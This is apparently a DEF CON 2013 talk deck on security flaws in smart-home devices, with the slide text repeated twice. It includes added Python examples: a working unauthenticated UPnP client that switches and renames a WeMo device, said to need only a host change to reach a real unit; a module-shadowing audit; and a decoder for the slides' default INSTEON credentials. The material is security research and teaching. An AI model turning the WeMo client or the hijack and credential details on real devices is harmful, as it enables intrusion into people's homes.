Home Invasion v2.0
© 2012
WHO ARE WE?
The Presenters

Daniel “unicornFurnace” Crowley
•  Managing Consultant, Trustwave SpiderLabs

Jennifer “savagejen” Savage
•  Software Engineer, Tabbedout

David “videoman” Bryan
•  Security Consultant, Trustwave SpiderLabs
WHAT ARE WE DOING HERE?
The “Smart” Home

•  Science fiction becomes science fact
•  Race to release novel products means poor security
•  Attempt to hack a sampling of “smart” devices
•  Many products we didn’t cover
   o  Android powered oven
   o  Smart TVs (another talk is covering one!)
   o  IP security cameras
WHAT’S OUT THERE NOW?
Locks, thermostats, fridges, toilets, lights, toys
Entire smart cities like Songdo

WHAT’S IN THE FUTURE?
Karotz Smart Rabbit

•  Exposure of wifi network credentials unencrypted
•  Unencrypted remote API calls
•  Unencrypted setup package download
•  Python module hijack in autorunwifi script
  
Karotz Smart Rabbit: Python Module Hijacking

•  Python Module Hijacking is insecure library loading
   o  Similar to LD_PRELOAD and DLL hijacking
•  Python puts the directory of the script being run at the front of sys.path, so that directory is searched before the standard library and site-packages
•  Karotz autorunwifi script uses simplejson module
   o  Put code to execute in simplejson.py in the same directory as autorunwifi; it runs with the script’s privileges as soon as the script does `import simplejson`
•  Defeats code signing: the signed script is untouched, the attacker’s code arrives through an import the script performs
Karotz Smart Rabbit

An attacker could:
•  MITM insecure connection to Karotz server
•  Replace user's download with malicious version
•  Use vuln to make Karotz run their own code!
•  ...Bunny bot net?
	
  
Belkin WeMo Switch

•  Vulnerable libupnp version
   o  Remote pre-auth root
•  Unauthenticated UPnP actions
   o  SetBinaryState
   o  SetFriendlyName
•  EULA used to “secure” the device.
•  Belkin has been awesome!
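The unauthenticated SetBinaryState / SetFriendlyName exchange, with both sides shown, as an added example that is not part of the talk or of Belkin’s code. The service URN and the two action names are the ones listed above; the control URL `/upnp/control/basicevent1`, the SOAP argument names and the reply format are assumptions modelled on the WeMo’s device description (compare against setup.xml on a real unit). `FakeSwitch` is a stand-in device that behaves the way the finding describes: it never checks who is asking.

```python
"""Unauthenticated UPnP control action, with both sides of the exchange.

Added example, not code from the talk or from Belkin.  Service URN and the
SetBinaryState / SetFriendlyName actions are those the slide names; control
URL, argument names and reply shape are assumptions modelled on the WeMo
device description (compare with setup.xml on a real unit).
"""
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

SERVICE = "urn:Belkin:service:basicevent:1"
CONTROL_URL = "/upnp/control/basicevent1"   # assumption, taken from setup.xml

def soap_envelope(action: str, args: dict) -> bytes:
    """Build the SOAP body a UPnP control point sends for one action."""
    inner = "".join(f"<{k}>{v}</{k}>" for k, v in args.items())
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
        f'<s:Body><u:{action} xmlns:u="{SERVICE}">{inner}</u:{action}></s:Body>'
        "</s:Envelope>"
    ).encode()

def soap_arg(xml: str, name: str) -> str:
    """Pull one argument out of a SOAP body (sufficient for this exchange)."""
    m = re.search(rf"<{name}>([^<]*)</{name}>", xml)
    return m.group(1) if m else ""

class FakeSwitch(BaseHTTPRequestHandler):
    """Stand-in device: the control endpoint of an unauthenticated switch."""
    state = {"BinaryState": "0", "FriendlyName": "WeMo Switch"}

    def do_POST(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0))).decode()
        action = self.headers.get("SOAPACTION", "").strip('"').split("#")[-1]
        # The finding in one line: no Authorization header is ever examined,
        # so any host that can reach this port controls the relay.
        if self.path != CONTROL_URL:
            self.send_error(404)
            return
        if action == "SetBinaryState" and soap_arg(body, "BinaryState") in ("0", "1"):
            self.state["BinaryState"] = soap_arg(body, "BinaryState")
        elif action == "SetFriendlyName" and soap_arg(body, "FriendlyName"):
            self.state["FriendlyName"] = soap_arg(body, "FriendlyName")
        elif action not in ("GetBinaryState", "GetFriendlyName"):
            self.send_error(500)
            return
        key = "FriendlyName" if action.endswith("FriendlyName") else "BinaryState"
        reply = soap_envelope(action + "Response", {key: self.state[key]})
        self.send_response(200)
        self.send_header("Content-Type", 'text/xml; charset="utf-8"')
        self.send_header("Content-Length", str(len(reply)))
        self.end_headers()
        self.wfile.write(reply)

    def log_message(self, *args):   # keep the demo quiet
        pass

def start_fake_switch() -> HTTPServer:
    """Serve FakeSwitch on a random loopback port from a background thread."""
    srv = HTTPServer(("127.0.0.1", 0), FakeSwitch)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv

def upnp_action(host: str, port: int, action: str, args: dict) -> str:
    """Send one control action as a control point would; return the reply XML."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("POST", CONTROL_URL, soap_envelope(action, args), {
        "Content-Type": 'text/xml; charset="utf-8"',
        "SOAPACTION": f'"{SERVICE}#{action}"',
    })
    resp = conn.getresponse()
    text = resp.read().decode()
    conn.close()
    if resp.status != 200:
        raise RuntimeError(f"{action} failed: HTTP {resp.status}")
    return text

def set_binary_state(host: str, port: int, on: bool) -> str:
    """Flip the relay; returns the state the device reports back ('0' or '1')."""
    reply = upnp_action(host, port, "SetBinaryState", {"BinaryState": "1" if on else "0"})
    return soap_arg(reply, "BinaryState")

def set_friendly_name(host: str, port: int, name: str) -> str:
    reply = upnp_action(host, port, "SetFriendlyName", {"FriendlyName": name})
    return soap_arg(reply, "FriendlyName")

if __name__ == "__main__":
    srv = start_fake_switch()
    port = srv.server_address[1]
    print("relay now:", set_binary_state("127.0.0.1", port, True))
    print("renamed to:", set_friendly_name("127.0.0.1", port, "Nothing to see here"))
    srv.shutdown()
```

The client side is an ordinary UPnP control point: a POST with a SOAPACTION header and no credential of any kind. Against a real unit the only things to change are the host, the port advertised in the SSDP reply, and the control URL from setup.xml.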
  
 	
  
SONOS Bridge

•  Support console information disclosure
LIXIL Satis Smart Toilet

•  Default Bluetooth PIN
INSTEON Hub

•  Lack of authentication on web console
   o  Web console exposed to the Internet; its pages disclose:
      §  Time zone – city
      §  Name, street
   o  Control all the things.
•  Fixed the authentication with model 2422-222 “R”
INSTEON Hub

•  Still lack of SSL/TLS
•  Uses HTTP Auth
   o  Base64 encoded credentials (readable by anyone on the path)
   o  Username: admin
   o  Password: ABCDEF  ← the INSTEON ID, i.e. the last 3 bytes of the MAC as six hex digits
   o  #SecurityFail
   o  It only takes 16 Million attempts (16^6 = 16,777,216)
MiCasaVerde VeraLite

•  Lack of authentication on web console by default
•  Insufficient Authorization Checks
   o  Firmware Update
   o  Settings backup
   o  Test Lua code
•  Path Traversal
•  Cross-Site Request Forgery
•  Lack of authentication on UPnP daemon
•  Vulnerable libupnp Version
•  Server Side Request Forgery
•  Unconfirmed Authentication Bypass
MiCasaVerde VeraLite

•  Three methods of auth bypass
•  Seven methods to get root
•  Two attacks remotely exploitable through SE (social engineering)
•  Potential for ownage of ALL the VeraLites!
DEMONSTRATION

CONCLUSION

Daniel “unicornFurnace” Crowley
  dcrowley@trustwave.com
  @dan_crowley

Jennifer “savagejen” Savage
  savagejen@gmail.com (PGP key ID 6326A948)
  @savagejen

David “videoman” Bryan
  dbryan@trustwave.com
  @_videoman_

Questions?

Home Invasion 2.0 - DEF CON 21 - 2013

2. © 2012 WHO ARE WE?

3. The Presenters
   Daniel “unicornFurnace” Crowley
   • Managing Consultant, Trustwave SpiderLabs
   Jennifer “savagejen” Savage
   • Software Engineer, Tabbedout
   David “videoman” Bryan
   • Security Consultant, Trustwave SpiderLabs

4. WHAT ARE WE DOING HERE?

5. The “Smart” Home
   Science fiction becomes science fact
   Race to release novel products means poor security
   Attempt to hack a sampling of “smart” devices
   Many products we didn’t cover
      Android powered oven
      Smart TVs (another talk is covering one!)
      IP security cameras

6. WHAT’S OUT THERE NOW?
   Locks, thermostats, fridges, toilets, lights, toys
   Entire smart cities like Songdo
   WHAT’S IN THE FUTURE?

7. Karotz Smart Rabbit

8. Karotz Smart Rabbit
   • Exposure of wifi network credentials unencrypted
   • Unencrypted remote API calls
   • Unencrypted setup package download
   • Python module hijack in autorunwifi script

11. Karotz Smart Rabbit: Python Module Hijacking
   • Python Module Hijacking is insecure library loading
     o Similar to LD_PRELOAD and DLL hijacking
   • Python loads modules from the dir of script first
   • Karotz autorunwifi script uses simplejson module
     o Put code to execute in simplejson.py in the same directory as autorunwifi
   • Defeats code signing
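The slide's point is that signing the script alone proves nothing if the import search path is writable: Python puts the directory of the script being run at `sys.path[0]`, ahead of the standard library and site-packages, so a same-named file there wins the lookup. The following is an added defender-side check, not code from the talk or from the Karotz firmware; it answers "for this script directory and this list of imports, would anything load from the script directory instead of where it should?" The demo uses a constructed temporary directory with a rogue `json.py` standing in for the `simplejson.py` of the slide (simplejson is not in the standard library, so `json` keeps the example self-contained). The function and module names are the example's own.

```python
"""Audit a script's directory for files that would shadow the modules it imports.

Added example (not code from the talk or from Karotz). Python's import system
searches the script's own directory first, so any file there named like an
imported module displaces the real one. This helper reports such shadowing so
an integrity check or code-signing step can cover the whole directory, not
just the entry-point script.
"""
import importlib
import os
import sys
import tempfile
from importlib.machinery import FrozenImporter, PathFinder


def find_shadowed_modules(script_dir, module_names, trusted_path=None):
    """Return {name: {"loaded_from": ..., "expected": ...}} for every module in
    `module_names` that would resolve to a file inside `script_dir`.

    `trusted_path` is the search path the modules are supposed to come from;
    it defaults to the running interpreter's sys.path with `script_dir` (and
    the '' entry meaning "current directory") removed.
    """
    importlib.invalidate_caches()  # never trust a stale directory listing
    script_dir = os.path.abspath(script_dir)
    base = sys.path if trusted_path is None else trusted_path
    trusted = [p for p in base if p and os.path.abspath(p) != script_dir]

    shadowed = {}
    for name in module_names:
        # Built-in and frozen modules are served by finders that run before the
        # path search, so a same-named file cannot displace them.
        if name in sys.builtin_module_names or FrozenImporter.find_spec(name) is not None:
            continue
        expected = PathFinder.find_spec(name, trusted)
        actual = PathFinder.find_spec(name, [script_dir] + trusted)
        if actual is None or actual.origin is None:
            continue
        origin = os.path.abspath(actual.origin)
        if origin.startswith(script_dir + os.sep):
            shadowed[name] = {
                "loaded_from": origin,
                "expected": expected.origin if expected is not None else None,
            }
    return shadowed


def demo():
    """Constructed scenario: a script directory holding a rogue json.py."""
    with tempfile.TemporaryDirectory() as script_dir:
        with open(os.path.join(script_dir, "json.py"), "w") as fh:
            fh.write("# constructed shadow module; nothing runs here\n")
        return find_shadowed_modules(script_dir, ["json", "os", "sys"])


if __name__ == "__main__":
    for name, info in demo().items():
        print(f"{name}: would load {info['loaded_from']} instead of {info['expected']}")
```

On Python 3.11 and later the same class of problem can be closed at the interpreter level with `python -P` or `PYTHONSAFEPATH=1`, which stop the script directory from being prepended to `sys.path`; on older interpreters the usual workaround is `sys.path.pop(0)` before any third-party import, together with signing or hashing every file in the directory rather than the entry script alone.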
12. Karotz Smart Rabbit
   An attacker could:
   • MITM insecure connection to Karotz server
   • Replace user's download with malicious version
   • Use vuln to make Karotz run their own code!
   • ...Bunny bot net?

13. Belkin WeMo Switch

14. Belkin WeMo Switch
   • Vulnerable libupnp version
     o Remote pre-auth root
   • Unauthenticated UPnP actions
     o SetBinaryState
     o SetFriendlyName
   • EULA used to “secure” the device.
   • Belkin has been awesome!

16. SONOS Bridge
   • Support console information disclosure

22. LIXIL Satis Smart Toilet

23. LIXIL Satis Smart Toilet
   • Default Bluetooth PIN

24. INSTEON Hub

26. INSTEON Hub
   • Lack of authentication on web console
     o Web console exposed to the Internet
       § Time zone – city
       § Name street
     o Control all the things.
   • Fixed the authentication with model 2422-222 “R”

27. INSTEON Hub
   • Still lack of SSL/TLS
   • Uses HTTP Auth
     o Base64 encoded credentials
     o Username: admin
     o Password: ABCDEF ← INSTEON ID and last 3 of the MAC
     o #SecurityFail
     o It only takes 16 Million attempts
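Slide 27 makes two separate points: Basic authentication over plain HTTP hands the password to anyone on the path (Base64 is encoding, not encryption), and a password that is six hex digits of a MAC address has only 16^6 candidates. The block below is an added example, not the talk's code and not anything from INSTEON: it decodes a constructed request carrying the slide's example credential pair, computes the size of that password space, and runs a minimal detection pass over constructed Common Log Format lines to flag a client piling up 401 responses. IP addresses, timestamps and the log format are the example's own assumptions.

```python
"""Added example (constructed; not the talk's code): Basic credentials on the
wire without TLS, the size of a six-hex-digit password space, and a simple
failed-login counter a defender can run over the console's access log.
"""
import base64
import re
from collections import Counter

# Constructed capture of one console request over plain HTTP. The credential
# pair is the slide's example (admin / ABCDEF), not a real device's.
CAPTURED_REQUEST = (
    "GET / HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "Authorization: Basic YWRtaW46QUJDREVG\r\n"
    "\r\n"
)

AUTH_RE = re.compile(r"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\s*$", re.M)


def parse_basic_auth(raw_request):
    """Recover (username, password) from a Basic Authorization header, exactly
    as anyone observing the unencrypted request could."""
    m = AUTH_RE.search(raw_request)
    if m is None:
        return None
    decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
    user, _, password = decoded.partition(":")
    return user, password


def keyspace_for_hex_suffix(hex_digits):
    """Candidate passwords when the secret is `hex_digits` hex characters; the
    low three bytes of a MAC address are six hex digits."""
    return 16 ** hex_digits


def worst_case_hours(keyspace, attempts_per_second):
    """Hours needed to try the whole space at a given request rate."""
    return keyspace / attempts_per_second / 3600


# Constructed access-log lines (Common Log Format): one client repeatedly
# failing authentication, one legitimate client.
SAMPLE_LOG = "\n".join(
    [f'192.0.2.77 - - [10/Aug/2013:12:00:{i:02d} +0000] "GET / HTTP/1.1" 401 0'
     for i in range(12)]
    + ['198.51.100.5 - - [10/Aug/2013:12:00:30 +0000] "GET / HTTP/1.1" 200 512']
)

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[^"]*" (?P<status>\d{3}) \S+$')


def auth_failures_by_client(log_text, threshold=10):
    """Return {client_ip: count} for clients with at least `threshold` 401s."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group("status") == "401":
            counts[m.group("ip")] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    print(parse_basic_auth(CAPTURED_REQUEST))
    space = keyspace_for_hex_suffix(6)
    print(f"{space:,} candidates; {worst_case_hours(space, 100):.1f} h at 100 req/s")
    print(auth_failures_by_client(SAMPLE_LOG))
```

The counter is deliberately crude; the more important fixes sit on the device side: TLS so the header is not readable in transit, lockout or rate limiting so the 16.7 million candidates cannot be walked, and a per-device random password rather than one derived from identifiers that are visible on the local network.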
29. MiCasaVerde VeraLite
   • Lack of authentication on web console by default
   • Insufficient Authorization Checks
     o Firmware Update
     o Settings backup
     o Test Lua code
   • Path Traversal
   • Cross-Site Request Forgery
   • Lack of authentication on UPnP daemon
   • Vulnerable libupnp Version
   • Server Side Request Forgery
   • Unconfirmed Authentication Bypass

30. MiCasaVerde VeraLite
   • Three methods of auth bypass
   • Seven methods to get root
   • Two attacks remotely exploitable through SE
   • Potential for ownage of ALL the VeraLites!

33. Questions?
   Daniel “unicornFurnace” Crowley
   dcrowley@trustwave.com
   @dan_crowley
   Jennifer “savagejen” Savage
   savagejen@gmail.com (PGP key ID 6326A948)
   @savagejen
   David “videoman” Bryan
   dbryan@trustwave.com
   @_videoman_